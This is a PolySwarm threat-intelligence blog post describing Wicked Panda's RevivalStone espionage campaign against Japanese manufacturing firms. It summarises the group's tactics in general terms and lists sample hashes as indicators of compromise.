The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Wicked Panda’s RevivalStone Campaign Targets Manufacturing Entities in Japan

Feb 28, 2025 1:03:00 PM / by The Hivemind

WICKEDPANDA022025Verticals Targeted: Manufacturing

Executive Summary

A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda was observed targeting Japan’s manufacturing sector. The campaign has been dubbed RevivalStone.

Key Takeaways

  • A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda is targeting Japan’s manufacturing sector, with continuing activity detected in early 2025. 
  • In this campaign, dubbed RevivalStone, the threat actors used a robust arsenal of custom backdoors, including newly developed variants with polymorphic capabilities.
  • Malware payloads used in the campaign include ELF-based injectors for Linux systems, leveraging shellcode injection to evade host-based defenses, and Windows PE files with heavily obfuscated code.

The Campaign 

A persistent and sophisticated espionage campaign by the China-linked threat actor group Wicked Panda is targeting Japan’s manufacturing sector, with continuing activity detected in early 2025. Wicked Panda leverages a combination of custom malware, zero-day exploits, and stealthy operational tactics, posing a significant risk. The campaign, first identified in late 2024, has escalated in scope and sophistication, making it a top concern for cybersecurity professionals monitoring nation-state threats in the region. LAC Security reported on this activity. 

In this campaign, dubbed RevivalStone, the threat actors used a robust arsenal of custom backdoors, including newly developed variants with polymorphic capabilities. They used spearphishing campaigns with weaponized PDFs, LNK files, or malicious Office macros to achieve initial access. They also exploited zero-day vulnerabilities in operational technology (OT) systems, such as Siemens PLCs, SCADA software, and Rockwell Automation platforms, as well as IT environments running unpatched Windows and Linux distributions. 

Malware payloads used in the campaign include ELF-based injectors for Linux systems, leveraging shellcode injection to evade host-based defenses, and Windows PE files with heavily obfuscated code, incorporating anti-debugging techniques and encrypted C2 communications via HTTPS/TLS tunnels on dynamic ports (e.g., 443/TCP, 8443/TCP). The group employed living-off-the-land techniques, such as PowerShell scripts, WMI queries, and BITSAdmin for lateral movement. Recent activity indicates AI-driven polymorphic malware adapting to sandbox environments, complicating static and dynamic analysis with evasion tactics, such as time-based delays and CPU fingerprinting.

This campaign primarily targeted automotive and electronics manufacturing entities in Japan, focusing on critical OT assets like distributed control systems, industrial IoT devices, and SCADA networks, which are integral to smart factory operations. The threat actors exfiltrated data including proprietary CAD files, production algorithms, and trade secrets, often compressed with RAR archives and embedded with steganographic techniques in image files to mask exfiltration traffic. This espionage campaign likely aligns with China’s strategic economic espionage goals by acquiring intelligence on advanced manufacturing techniques and competitive advantages in global markets. 

Who is Wicked Panda?

Wicked Panda, also known as Axiom, Winnti, APT41, and Bronze Atlas, is a sophisticated China nexus threat actor group perpetrating activity in support of or in conjunction with the Chinese Ministry of State Security (MSS) and the People's Liberation Army (PLA). Active since at least 2009, Wicked Panda’s roots seem to have emerged in cybercrime and later evolved into the group’s current form. 

Their activity has ranged from criminal, financially motivated attacks to stealthy espionage campaigns in support of Chinese military intelligence collection requirements. Wicked Panda has been known to attack a wide range of targets including software development companies, computer hardware manufacturers, telecommunications providers, social media companies, video game companies, non-profit organizations, universities, think tanks, manufacturing entities, and foreign governments. The group has targeted a broad range of entities across the APAC, AMEA, and AMERICAS regions.

Wicked Panda is known for having skilled programmers capable of developing sophisticated tools. The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad. The group is also known to steal software signing certificates to use in their campaigns. 

IOCs

PolySwarm has multiple samples associated with this activity.

 

e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596

169d35bdb36c2bfcb3bbf64392de1b05d56553172a13cae43a43acbe2aa18587

b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090

4608a63c039975fb8f3ffd221ec6877078542def44767f50447db1d514eb0779

1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c

 

You can use the following CLI command to search for all xx samples in our portal:

$ polyswarm link list -t RevivalStone

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 

Topics: Threat Bulletin, Wicked Panda, Winnti, RevivalStone

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts

Join the Marketplace

For Enterprises and Businesses

Learn More

For Security Experts and AV Companies

Learn More